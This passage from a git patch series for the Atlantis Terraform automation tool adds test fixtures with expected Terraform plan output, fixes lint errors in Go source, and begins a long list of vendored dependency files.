+infrastructure, so keep it safe. To inspect the complete state
+use the `terraform show` command.
+
+State path: staging.tfstate
+
+Outputs:
+
+var = staging
+workspace = default
+
+```
+
diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt b/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt
new file mode 100644
index 0000000000..d51e3ff700
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt
@@ -0,0 +1,51 @@
+Ran Plan for 2 projects:
+1. workspace: `default` path: `.`
+1. workspace: `default` path: `.`
+
+### 1. workspace: `default` path: `.`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+  + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+      id: <computed>
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+---
+### 2. workspace: `default` path: `.`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+  + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+      id: <computed>
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+---
+
diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt.act b/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt.act
new file mode 100644
index 0000000000..0da9bc5a5e
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt.act
@@ -0,0 +1,61 @@
+Ran Plan for 2 projects:
+1. workspace: `default` path: `.`
+1. workspace: `default` path: `.`
+
+### 1. workspace: `default` path: `.`
+**Plan Error**
+```
+exit status 1: running "sh -c terraform init -no-color -backend-config=default.backend.tfvars" in "/var/folders/z1/4z__7jv12y7f9yz__nwy55z40000gp/T/201347935/repos/runatlantis/atlantis-tests/1/default": 
+
+Initializing the backend...
+
+Successfully configured the backend "local"! Terraform will automatically
+use this backend unless the backend configuration changes.
+
+Initializing provider plugins...
+- Checking for available provider plugins on https://releases.hashicorp.com...
+
+Error installing provider "null": Get https://releases.hashicorp.com/terraform-provider-null/: net/http: TLS handshake timeout.
+
+Terraform analyses the configuration and state and automatically downloads
+plugins for the providers used. However, when attempting to download this
+plugin an unexpected error occured.
+
+This may be caused if for some reason Terraform is unable to reach the
+plugin repository. The repository may be unreachable if access is blocked
+by a firewall.
+
+If automatic installation is not possible or desirable in your environment,
+you may alternatively manually install plugins by downloading a suitable
+distribution package and placing the plugin's executable file in the
+following directory:
+    terraform.d/plugins/darwin_amd64
+
+
+```
+
+---
+### 2. workspace: `default` path: `.`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+  + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+      id: <computed>
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+---
+
diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-merge.txt b/server/testfixtures/test-repos/tfvars-yaml/exp-output-merge.txt
new file mode 100644
index 0000000000..c09b916bd6
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-merge.txt
@@ -0,0 +1,3 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- path: `runatlantis/atlantis-tests/.` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml/main.tf b/server/testfixtures/test-repos/tfvars-yaml/main.tf
new file mode 100644
index 0000000000..d4d77ff4e7
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/main.tf
@@ -0,0 +1,19 @@
+terraform {
+  backend "local" {
+  }
+}
+
+resource "null_resource" "simple" {
+  count = 1
+}
+
+variable "var" {
+}
+
+output "var" {
+  value = "${var.var}"
+}
+
+output "workspace" {
+  value = "${terraform.workspace}"
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml/staging.backend.tfvars b/server/testfixtures/test-repos/tfvars-yaml/staging.backend.tfvars
new file mode 100644
index 0000000000..e8133a2b59
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/staging.backend.tfvars
@@ -0,0 +1 @@
+path = "staging.tfstate"
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml/staging.tfvars b/server/testfixtures/test-repos/tfvars-yaml/staging.tfvars
new file mode 100644
index 0000000000..34f4bbb990
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/staging.tfvars
@@ -0,0 +1 @@
+var = "staging"
\ No newline at end of file

From 45d80fc695b445e70aeec2668f244730829016a1 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Tue, 19 Jun 2018 20:59:25 +0100
Subject: [PATCH 30/69] Fix gometalint errors.

---
 server/events/atlantis_workspace.go         | 4 ++--
 server/events/markdown_renderer.go          | 1 -
 server/events/project_finder_test.go        | 1 +
 server/events/project_operator.go           | 6 +++---
 server/events/runtime/init_step_operator.go | 1 +
 server/events/yaml/parser_validator_test.go | 8 --------
 server/events_controller.go                 | 6 +++---
 testing/temp_files.go                       | 4 +++-
 8 files changed, 13 insertions(+), 18 deletions(-)

diff --git a/server/events/atlantis_workspace.go b/server/events/atlantis_workspace.go
index 67112b1ce4..06944bdae7 100644
--- a/server/events/atlantis_workspace.go
+++ b/server/events/atlantis_workspace.go
@@ -70,11 +70,11 @@ func (w *FileWorkspace) Clone(
 			return "", errors.Wrapf(err, "running git rev-parse HEAD: %s", string(output))
 		}
 		currCommit := strings.Trim(string(output), "\n")
-		if string(currCommit) == p.HeadCommit {
+		if currCommit == p.HeadCommit {
 			log.Debug("repo is at correct commit %q so will not re-clone", p.HeadCommit)
 			return cloneDir, nil
 		}
-		log.Debug("repo was already cloned but is not at correct commit, wanted %q got %q", p.HeadCommit, string(currCommit))
+		log.Debug("repo was already cloned but is not at correct commit, wanted %q got %q", p.HeadCommit, currCommit)
 
 		// It's okay to delete all plans now since they're out of date.
 		log.Info("cleaning clone directory %q", cloneDir)
diff --git a/server/events/markdown_renderer.go b/server/events/markdown_renderer.go
index 0f623f04a6..acb0d86791 100644
--- a/server/events/markdown_renderer.go
+++ b/server/events/markdown_renderer.go
@@ -154,6 +154,5 @@ var errWithLogTmpl = template.Must(template.New("").Parse(errTmplText + logTmpl)
 var failureTmplText = "**{{.Command}} Failed**: {{.Failure}}\n"
 var failureTmpl = template.Must(template.New("").Parse(failureTmplText))
 var failureWithLogTmpl = template.Must(template.New("").Parse(failureTmplText + logTmpl))
-var autoplanNoProjectsTmpl = template.Must(template.New("").Parse(autoplanNoProjectsTmplText))
 var autoplanNoProjectsWithLogTmpl = template.Must(template.New("").Parse(autoplanNoProjectsTmplText + logTmpl))
 var logTmpl = "{{if .Verbose}}\n<details><summary>Log</summary>\n  <p>\n\n```\n{{.Log}}```\n</p></details>{{end}}\n"
diff --git a/server/events/project_finder_test.go b/server/events/project_finder_test.go
index 8e787a6eec..82aa84b847 100644
--- a/server/events/project_finder_test.go
+++ b/server/events/project_finder_test.go
@@ -47,6 +47,7 @@ func setupTmpRepos(t *testing.T) {
 	//     main.tf
 	var err error
 	nestedModules1, err = ioutil.TempDir("", "")
+	Ok(t, err)
 	err = os.MkdirAll(filepath.Join(nestedModules1, "project1/modules"), 0700)
 	Ok(t, err)
 	files := []string{
diff --git a/server/events/project_operator.go b/server/events/project_operator.go
index 5e7e7e43e9..b5e8184ec3 100644
--- a/server/events/project_operator.go
+++ b/server/events/project_operator.go
@@ -68,12 +68,12 @@ func (p *ProjectOperator) Plan(ctx models.ProjectCommandContext, projAbsPathPtr
 	var projAbsPath string
 	if projAbsPathPtr == nil {
 		ctx.Log.Debug("project has not yet been cloned")
-		repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Workspace)
-		if err != nil {
+		repoDir, cloneErr := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Workspace)
+		if cloneErr != nil {
 			if unlockErr := lockAttempt.UnlockFn(); unlockErr != nil {
 				ctx.Log.Err("error unlocking state after plan error: %v", unlockErr)
 			}
-			return ProjectResult{Error: err}
+			return ProjectResult{Error: cloneErr}
 		}
 		projAbsPath = filepath.Join(repoDir, ctx.RepoRelPath)
 		ctx.Log.Debug("project successfully cloned to %q", projAbsPath)
diff --git a/server/events/runtime/init_step_operator.go b/server/events/runtime/init_step_operator.go
index 307c91bcfe..f483ecbbd9 100644
--- a/server/events/runtime/init_step_operator.go
+++ b/server/events/runtime/init_step_operator.go
@@ -11,6 +11,7 @@ type InitStepOperator struct {
 	DefaultTFVersion  *version.Version
 }
 
+// nolint: unparam
 func (i *InitStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) {
 	tfVersion := i.DefaultTFVersion
 	if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil {
diff --git a/server/events/yaml/parser_validator_test.go b/server/events/yaml/parser_validator_test.go
index abafcba940..fe11f82c72 100644
--- a/server/events/yaml/parser_validator_test.go
+++ b/server/events/yaml/parser_validator_test.go
@@ -616,14 +616,6 @@ workflows:
 	}
 }
 
-// Bool is a helper routine that allocates a new bool value
-// to store v and returns a pointer to it.
-func Bool(v bool) *bool { return &v }
-
-// Int is a helper routine that allocates a new int value
-// to store v and returns a pointer to it.
-func Int(v int) *int { return &v }
-
 // String is a helper routine that allocates a new string value
 // to store v and returns a pointer to it.
 func String(v string) *string { return &v }
diff --git a/server/events_controller.go b/server/events_controller.go
index e41fe75c23..a132b094c9 100644
--- a/server/events_controller.go
+++ b/server/events_controller.go
@@ -165,7 +165,7 @@ func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRep
 		// whitelisted. This is because the user might be expecting Atlantis to
 		// autoplan. For other events, we just ignore them.
 		if eventType == OpenPullEvent {
-			e.commentNotWhitelisted(w, baseRepo, pull.Num)
+			e.commentNotWhitelisted(baseRepo, pull.Num)
 		}
 		e.respond(w, logging.Debug, http.StatusForbidden, "Ignoring pull request event from non-whitelisted repo")
 		return
@@ -255,7 +255,7 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo
 	// At this point we know it's a command we're not supposed to ignore, so now
 	// we check if this repo is allowed to run commands in the first place.
 	if !e.RepoWhitelist.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) {
-		e.commentNotWhitelisted(w, baseRepo, pullNum)
+		e.commentNotWhitelisted(baseRepo, pullNum)
 		e.respond(w, logging.Warn, http.StatusForbidden, "Repo not whitelisted")
 		return
 	}
@@ -328,7 +328,7 @@ func (e *EventsController) respond(w http.ResponseWriter, lvl logging.LogLevel,
 
 // commentNotWhitelisted comments on the pull request that the repo is not
 // whitelisted.
-func (e *EventsController) commentNotWhitelisted(w http.ResponseWriter, baseRepo models.Repo, pullNum int) {
+func (e *EventsController) commentNotWhitelisted(baseRepo models.Repo, pullNum int) {
 	errMsg := "```\nError: This repo is not whitelisted for Atlantis.\n```"
 	if err := e.VCSClient.CreateComment(baseRepo, pullNum, errMsg); err != nil {
 		e.Logger.Err("unable to comment on pull request: %s", err)
diff --git a/testing/temp_files.go b/testing/temp_files.go
index 85dd68c5b1..1bfd0f15f4 100644
--- a/testing/temp_files.go
+++ b/testing/temp_files.go
@@ -13,5 +13,7 @@ import (
 func TempDir(t *testing.T) (string, func()) {
 	tmpDir, err := ioutil.TempDir("", "")
 	Ok(t, err)
-	return tmpDir, func() { os.RemoveAll(tmpDir) }
+	return tmpDir, func() {
+		os.RemoveAll(tmpDir) // nolint: errcheck
+	}
 }

From 21694c92307754a6c4bf2662ca688c2ea5005ab2 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Tue, 19 Jun 2018 21:10:07 +0100
Subject: [PATCH 31/69] Run dep ensure

---
 Gopkg.lock                                    |   68 +-
 .../github.com/Masterminds/semver/.travis.yml |   27 +
 .../Masterminds/semver/CHANGELOG.md           |   86 +
 .../github.com/Masterminds/semver/LICENSE.txt |   20 +
 vendor/github.com/Masterminds/semver/Makefile |   36 +
 .../github.com/Masterminds/semver/README.md   |  165 +
 .../Masterminds/semver/appveyor.yml           |   44 +
 .../Masterminds/semver/benchmark_test.go      |  157 +
 .../Masterminds/semver/collection.go          |   24 +
 .../Masterminds/semver/collection_test.go     |   46 +
 .../Masterminds/semver/constraints.go         |  426 +
 .../Masterminds/semver/constraints_test.go    |  465 +
 vendor/github.com/Masterminds/semver/doc.go   |  115 +
 .../github.com/Masterminds/semver/version.go  |  421 +
 .../Masterminds/semver/version_test.go        |  490 ++
 .../github.com/Masterminds/sprig/.gitignore   |    2 +
 .../github.com/Masterminds/sprig/.travis.yml  |   23 +
 .../github.com/Masterminds/sprig/CHANGELOG.md |  153 +
 .../github.com/Masterminds/sprig/LICENSE.txt  |   20 +
 vendor/github.com/Masterminds/sprig/Makefile  |   13 +
 vendor/github.com/Masterminds/sprig/README.md |   81 +
 .../github.com/Masterminds/sprig/appveyor.yml |   26 +
 vendor/github.com/Masterminds/sprig/crypto.go |  430 +
 .../Masterminds/sprig/crypto_test.go          |  259 +
 vendor/github.com/Masterminds/sprig/date.go   |   76 +
 .../github.com/Masterminds/sprig/date_test.go |   36 +
 .../github.com/Masterminds/sprig/defaults.go  |   84 +
 .../Masterminds/sprig/defaults_test.go        |  129 +
 vendor/github.com/Masterminds/sprig/dict.go   |   88 +
 .../github.com/Masterminds/sprig/dict_test.go |  175 +
 vendor/github.com/Masterminds/sprig/doc.go    |  233 +
 .../Masterminds/sprig/docs/_config.yml        |    1 +
 .../Masterminds/sprig/docs/conversion.md      |   25 +
 .../Masterminds/sprig/docs/crypto.md          |  133 +
 .../github.com/Masterminds/sprig/docs/date.md |   88 +
 .../Masterminds/sprig/docs/defaults.md        |  113 +
 .../Masterminds/sprig/docs/dicts.md           |  131 +
 .../Masterminds/sprig/docs/encoding.md        |    6 +
 .../Masterminds/sprig/docs/flow_control.md    |   11 +
 .../Masterminds/sprig/docs/index.md           |   23 +
 .../Masterminds/sprig/docs/integer_slice.md   |   25 +
 .../Masterminds/sprig/docs/lists.md           |  111 +
 .../github.com/Masterminds/sprig/docs/math.md |   63 +
 .../github.com/Masterminds/sprig/docs/os.md   |   24 +
 .../Masterminds/sprig/docs/paths.md           |   43 +
 .../Masterminds/sprig/docs/reflection.md      |   38 +
 .../Masterminds/sprig/docs/semver.md          |  124 +
 .../Masterminds/sprig/docs/string_slice.md    |   55 +
 .../Masterminds/sprig/docs/strings.md         |  397 +
 .../github.com/Masterminds/sprig/docs/uuid.md |    9 +
 .../Masterminds/sprig/example_test.go         |   25 +
 .../Masterminds/sprig/flow_control_test.go    |   16 +
 .../github.com/Masterminds/sprig/functions.go |  281 +
 .../Masterminds/sprig/functions_test.go       |  108 +
 .../github.com/Masterminds/sprig/glide.lock   |   33 +
 .../github.com/Masterminds/sprig/glide.yaml   |   15 +
 vendor/github.com/Masterminds/sprig/list.go   |  259 +
 .../github.com/Masterminds/sprig/list_test.go |  157 +
 .../github.com/Masterminds/sprig/numeric.go   |  159 +
 .../Masterminds/sprig/numeric_test.go         |  205 +
 .../github.com/Masterminds/sprig/reflect.go   |   28 +
 .../Masterminds/sprig/reflect_test.go         |   73 +
 vendor/github.com/Masterminds/sprig/regex.go  |   35 +
 .../Masterminds/sprig/regex_test.go           |   61 +
 vendor/github.com/Masterminds/sprig/semver.go |   23 +
 .../Masterminds/sprig/semver_test.go          |   31 +
 .../github.com/Masterminds/sprig/strings.go   |  201 +
 .../Masterminds/sprig/strings_test.go         |  227 +
 vendor/github.com/Sirupsen/logrus/.gitignore  |    1 +
 vendor/github.com/Sirupsen/logrus/.travis.yml |   15 +
 .../github.com/Sirupsen/logrus/CHANGELOG.md   |  123 +
 vendor/github.com/Sirupsen/logrus/LICENSE     |   21 +
 vendor/github.com/Sirupsen/logrus/README.md   |  511 ++
 vendor/github.com/Sirupsen/logrus/alt_exit.go |   64 +
 .../Sirupsen/logrus/alt_exit_test.go          |   83 +
 .../github.com/Sirupsen/logrus/appveyor.yml   |   14 +
 vendor/github.com/Sirupsen/logrus/doc.go      |   26 +
 vendor/github.com/Sirupsen/logrus/entry.go    |  288 +
 .../github.com/Sirupsen/logrus/entry_test.go  |  115 +
 .../Sirupsen/logrus/example_basic_test.go     |   69 +
 .../Sirupsen/logrus/example_hook_test.go      |   35 +
 vendor/github.com/Sirupsen/logrus/exported.go |  193 +
 .../github.com/Sirupsen/logrus/formatter.go   |   45 +
 .../Sirupsen/logrus/formatter_bench_test.go   |  101 +
 .../github.com/Sirupsen/logrus/hook_test.go   |  144 +
 vendor/github.com/Sirupsen/logrus/hooks.go    |   34 +
 .../Sirupsen/logrus/hooks/syslog/README.md    |   39 +
 .../Sirupsen/logrus/hooks/syslog/syslog.go    |   55 +
 .../logrus/hooks/syslog/syslog_test.go        |   27 +
 .../Sirupsen/logrus/hooks/test/test.go        |   95 +
 .../Sirupsen/logrus/hooks/test/test_test.go   |   61 +
 .../Sirupsen/logrus/json_formatter.go         |   79 +
 .../Sirupsen/logrus/json_formatter_test.go    |  199 +
 vendor/github.com/Sirupsen/logrus/logger.go   |  323 +
 .../Sirupsen/logrus/logger_bench_test.go      |   61 +
 vendor/github.com/Sirupsen/logrus/logrus.go   |  143 +
 .../github.com/Sirupsen/logrus/logrus_test.go |  386 +
 .../Sirupsen/logrus/terminal_bsd.go           |   10 +
 .../logrus/terminal_check_appengine.go        |   11 +
 .../logrus/terminal_check_notappengine.go     |   19 +
 .../Sirupsen/logrus/terminal_linux.go         |   14 +
 .../Sirupsen/logrus/text_formatter.go         |  178 +
 .../Sirupsen/logrus/text_formatter_test.go    |  141 +
 vendor/github.com/Sirupsen/logrus/writer.go   |   62 +
 vendor/github.com/aokoli/goutils/.travis.yml  |   18 +
 vendor/github.com/aokoli/goutils/CHANGELOG.md |    8 +
 vendor/github.com/aokoli/goutils/LICENSE.txt  |  202 +
 vendor/github.com/aokoli/goutils/README.md    |   70 +
 vendor/github.com/aokoli/goutils/appveyor.yml |   21 +
 .../aokoli/goutils/randomstringutils.go       |  268 +
 .../aokoli/goutils/randomstringutils_test.go  |   78 +
 .../github.com/aokoli/goutils/stringutils.go  |  224 +
 .../aokoli/goutils/stringutils_test.go        |  309 +
 vendor/github.com/aokoli/goutils/wordutils.go |  356 +
 .../aokoli/goutils/wordutils_test.go          |  225 +
 vendor/github.com/davecgh/go-spew/.gitignore  |   22 +
 vendor/github.com/davecgh/go-spew/.travis.yml |   14 +
 vendor/github.com/davecgh/go-spew/LICENSE     |   15 +
 vendor/github.com/davecgh/go-spew/README.md   |  205 +
 .../github.com/davecgh/go-spew/cov_report.sh  |   22 +
 .../github.com/davecgh/go-spew/spew/bypass.go |  152 +
 .../davecgh/go-spew/spew/bypasssafe.go        |   38 +
 .../github.com/davecgh/go-spew/spew/common.go |  341 +
 .../davecgh/go-spew/spew/common_test.go       |  298 +
 .../github.com/davecgh/go-spew/spew/config.go |  306 +
 vendor/github.com/davecgh/go-spew/spew/doc.go |  211 +
 .../github.com/davecgh/go-spew/spew/dump.go   |  509 ++
 .../davecgh/go-spew/spew/dump_test.go         | 1042 +++
 .../davecgh/go-spew/spew/dumpcgo_test.go      |   99 +
 .../davecgh/go-spew/spew/dumpnocgo_test.go    |   26 +
 .../davecgh/go-spew/spew/example_test.go      |  226 +
 .../github.com/davecgh/go-spew/spew/format.go |  419 +
 .../davecgh/go-spew/spew/format_test.go       | 1558 ++++
 .../davecgh/go-spew/spew/internal_test.go     |   87 +
 .../go-spew/spew/internalunsafe_test.go       |  102 +
 .../github.com/davecgh/go-spew/spew/spew.go   |  148 +
 .../davecgh/go-spew/spew/spew_test.go         |  320 +
 .../davecgh/go-spew/spew/testdata/dumpcgo.go  |   82 +
 .../davecgh/go-spew/test_coverage.txt         |   61 +
 vendor/github.com/docker/docker/.dockerignore |    4 +
 .../docker/docker/.github/ISSUE_TEMPLATE.md   |   64 +
 .../docker/.github/PULL_REQUEST_TEMPLATE.md   |   30 +
 vendor/github.com/docker/docker/.gitignore    |   33 +
 vendor/github.com/docker/docker/.mailmap      |  275 +
 vendor/github.com/docker/docker/AUTHORS       | 1652 ++++
 vendor/github.com/docker/docker/CHANGELOG.md  | 3337 +++++++
 .../github.com/docker/docker/CONTRIBUTING.md  |  401 +
 vendor/github.com/docker/docker/Dockerfile    |  246 +
 .../docker/docker/Dockerfile.aarch64          |  175 +
 .../github.com/docker/docker/Dockerfile.armhf |  182 +
 .../docker/docker/Dockerfile.ppc64le          |  188 +
 .../github.com/docker/docker/Dockerfile.s390x |  190 +
 .../docker/docker/Dockerfile.simple           |   73 +
 .../docker/docker/Dockerfile.solaris          |   20 +
 .../docker/docker/Dockerfile.windows          |  267 +
 vendor/github.com/docker/docker/LICENSE       |  191 +
 vendor/github.com/docker/docker/MAINTAINERS   |  376 +
 vendor/github.com/docker/docker/Makefile      |  147 +
 vendor/github.com/docker/docker/NOTICE        |   19 +
 vendor/github.com/docker/docker/README.md     |  304 +
 vendor/github.com/docker/docker/ROADMAP.md    |  118 +
 vendor/github.com/docker/docker/VENDORING.md  |   45 +
 vendor/github.com/docker/docker/VERSION       |    1 +
 vendor/github.com/docker/docker/api/README.md |   42 +
 vendor/github.com/docker/docker/api/common.go |  166 +
 .../docker/docker/api/common_test.go          |  341 +
 .../docker/docker/api/common_unix.go          |    6 +
 .../docker/docker/api/common_windows.go       |    8 +
 .../docker/docker/api/errors/errors.go        |   47 +
 .../docker/docker/api/fixtures/keyfile        |    7 +
 .../docker/api/server/httputils/decoder.go    |   16 +
 .../docker/api/server/httputils/errors.go     |  101 +
 .../docker/api/server/httputils/form.go       |   73 +
 .../docker/api/server/httputils/form_test.go  |  105 +
 .../docker/api/server/httputils/httputils.go  |   90 +
 .../server/httputils/httputils_write_json.go  |   17 +
 .../httputils/httputils_write_json_go16.go    |   16 +
 .../docker/docker/api/server/middleware.go    |   24 +
 .../docker/api/server/middleware/cors.go      |   37 +
 .../docker/api/server/middleware/debug.go     |   76 +
 .../api/server/middleware/experimental.go     |   29 +
 .../api/server/middleware/middleware.go       |   13 +
 .../docker/api/server/middleware/version.go   |   50 +
 .../api/server/middleware/version_test.go     |   57 +
 .../docker/docker/api/server/profiler.go      |   41 +
 .../docker/api/server/router/build/backend.go |   20 +
 .../docker/api/server/router/build/build.go   |   29 +
 .../api/server/router/build/build_routes.go   |  225 +
 .../api/server/router/checkpoint/backend.go   |   10 +
 .../server/router/checkpoint/checkpoint.go    |   36 +
 .../router/checkpoint/checkpoint_routes.go    |   65 +
 .../api/server/router/container/backend.go    |   79 +
 .../api/server/router/container/container.go  |   77 +
 .../router/container/container_routes.go      |  554 ++
 .../api/server/router/container/copy.go       |  119 +
 .../api/server/router/container/exec.go       |  140 +
 .../api/server/router/container/inspect.go    |   21 +
 .../docker/api/server/router/experimental.go  |   67 +
 .../docker/api/server/router/image/backend.go |   45 +
 .../docker/api/server/router/image/image.go   |   50 +
 .../api/server/router/image/image_routes.go   |  344 +
 .../docker/docker/api/server/router/local.go  |   96 +
 .../api/server/router/network/backend.go      |   22 +
 .../api/server/router/network/filter.go       |   96 +
 .../api/server/router/network/network.go      |   44 +
 .../server/router/network/network_routes.go   |  308 +
 .../api/server/router/plugin/backend.go       |   25 +
 .../docker/api/server/router/plugin/plugin.go |   39 +
 .../api/server/router/plugin/plugin_routes.go |  314 +
 .../docker/docker/api/server/router/router.go |   19 +
 .../docker/api/server/router/swarm/backend.go |   36 +
 .../docker/api/server/router/swarm/cluster.go |   52 +
 .../api/server/router/swarm/cluster_routes.go |  418 +
 .../api/server/router/system/backend.go       |   21 +
 .../docker/api/server/router/system/system.go |   39 +
 .../api/server/router/system/system_routes.go |  186 +
 .../api/server/router/volume/backend.go       |   17 +
 .../docker/api/server/router/volume/volume.go |   36 +
 .../api/server/router/volume/volume_routes.go |   80 +
 .../docker/api/server/router_swapper.go       |   30 +
 .../docker/docker/api/server/server.go        |  210 +
 .../docker/docker/api/server/server_test.go   |   46 +
 .../docker/docker/api/swagger-gen.yaml        |   12 +
 .../github.com/docker/docker/api/swagger.yaml | 7785 +++++++++++++++++
 .../api/templates/server/operation.gotmpl     |   26 +
 .../docker/docker/api/types/auth.go           |   22 +
 .../docker/api/types/backend/backend.go       |   84 +
 .../docker/docker/api/types/blkiodev/blkio.go |   23 +
 .../docker/docker/api/types/client.go         |  378 +
 .../docker/docker/api/types/configs.go        |   69 +
 .../docker/api/types/container/config.go      |   62 +
 .../api/types/container/container_create.go   |   21 +
 .../api/types/container/container_update.go   |   17 +
 .../api/types/container/container_wait.go     |   17 +
 .../docker/api/types/container/host_config.go |  333 +
 .../api/types/container/hostconfig_unix.go    |   81 +
 .../api/types/container/hostconfig_windows.go |   87 +
 .../docker/docker/api/types/error_response.go |   13 +
 .../docker/docker/api/types/events/events.go  |   42 +
 .../docker/docker/api/types/filters/parse.go  |  310 +
 .../docker/api/types/filters/parse_test.go    |  417 +
 .../docker/docker/api/types/id_response.go    |   13 +
 .../docker/docker/api/types/image_summary.go  |   49 +
 .../docker/docker/api/types/mount/mount.go    |  113 +
 .../docker/api/types/network/network.go       |   59 +
 .../docker/docker/api/types/plugin.go         |  189 +
 .../docker/docker/api/types/plugin_device.go  |   25 +
 .../docker/docker/api/types/plugin_env.go     |   25 +
 .../docker/api/types/plugin_interface_type.go |   21 +
 .../docker/docker/api/types/plugin_mount.go   |   37 +
 .../docker/api/types/plugin_responses.go      |   64 +
 .../docker/docker/api/types/port.go           |   23 +
 .../api/types/reference/image_reference.go    |   34 +
 .../types/reference/image_reference_test.go   |   72 +
 .../docker/api/types/registry/authenticate.go |   21 +
 .../docker/api/types/registry/registry.go     |  104 +
 .../docker/docker/api/types/seccomp.go        |   93 +
 .../api/types/service_update_response.go      |   12 +
 .../docker/docker/api/types/stats.go          |  178 +
 .../docker/api/types/strslice/strslice.go     |   30 +
 .../api/types/strslice/strslice_test.go       |   86 +
 .../docker/docker/api/types/swarm/common.go   |   27 +
 .../docker/api/types/swarm/container.go       |   46 +
 .../docker/docker/api/types/swarm/network.go  |  111 +
 .../docker/docker/api/types/swarm/node.go     |  114 +
 .../docker/docker/api/types/swarm/secret.go   |   31 +
 .../docker/docker/api/types/swarm/service.go  |  105 +
 .../docker/docker/api/types/swarm/swarm.go    |  197 +
 .../docker/docker/api/types/swarm/task.go     |  128 +
 .../docker/api/types/time/duration_convert.go |   12 +
 .../api/types/time/duration_convert_test.go   |   26 +
 .../docker/docker/api/types/time/timestamp.go |  124 +
 .../docker/api/types/time/timestamp_test.go   |   93 +
 .../docker/docker/api/types/types.go          |  549 ++
 .../docker/api/types/versions/README.md       |   14 +
 .../docker/api/types/versions/compare.go      |   62 +
 .../docker/api/types/versions/compare_test.go |   26 +
 .../docker/api/types/versions/v1p19/types.go  |   35 +
 .../docker/api/types/versions/v1p20/types.go  |   40 +
 .../docker/docker/api/types/volume.go         |   58 +
 .../docker/api/types/volume/volumes_create.go |   29 +
 .../docker/api/types/volume/volumes_list.go   |   23 +
 .../docker/docker/builder/builder.go          |  169 +
 .../docker/docker/builder/context.go          |  260 +
 .../docker/docker/builder/context_test.go     |  307 +
 .../docker/docker/builder/context_unix.go     |   11 +
 .../docker/docker/builder/context_windows.go  |   17 +
 .../docker/docker/builder/dockerfile/bflag.go |  176 +
 .../docker/builder/dockerfile/bflag_test.go   |  187 +
 .../docker/builder/dockerfile/builder.go      |  370 +
 .../docker/builder/dockerfile/builder_unix.go |    5 +
 .../builder/dockerfile/builder_windows.go     |    3 +
 .../builder/dockerfile/command/command.go     |   46 +
 .../docker/builder/dockerfile/dispatchers.go  |  821 ++
 .../builder/dockerfile/dispatchers_test.go    |  517 ++
 .../builder/dockerfile/dispatchers_unix.go    |   27 +
 .../dockerfile/dispatchers_unix_test.go       |   33 +
 .../builder/dockerfile/dispatchers_windows.go |   86 +
 .../dockerfile/dispatchers_windows_test.go    |   40 +
 .../docker/builder/dockerfile/envVarTest      |  116 +
 .../docker/builder/dockerfile/evaluator.go    |  244 +
 .../builder/dockerfile/evaluator_test.go      |  197 +
 .../builder/dockerfile/evaluator_unix.go      |    9 +
 .../builder/dockerfile/evaluator_windows.go   |   13 +
 .../docker/builder/dockerfile/internals.go    |  669 ++
 .../builder/dockerfile/internals_test.go      |   95 +
 .../builder/dockerfile/internals_unix.go      |   38 +
 .../builder/dockerfile/internals_windows.go   |   66 +
 .../dockerfile/internals_windows_test.go      |   51 +
 .../builder/dockerfile/parser/dumper/main.go  |   36 +
 .../builder/dockerfile/parser/json_test.go    |   61 +
 .../builder/dockerfile/parser/line_parsers.go |  361 +
 .../builder/dockerfile/parser/parser.go       |  221 +
 .../builder/dockerfile/parser/parser_test.go  |  173 +
 .../parser/testfile-line/Dockerfile           |   35 +
 .../env_no_value/Dockerfile                   |    3 +
 .../shykes-nested-json/Dockerfile             |    1 +
 .../testfiles/ADD-COPY-with-JSON/Dockerfile   |   11 +
 .../testfiles/ADD-COPY-with-JSON/result       |   10 +
 .../testfiles/brimstone-consuldock/Dockerfile |   26 +
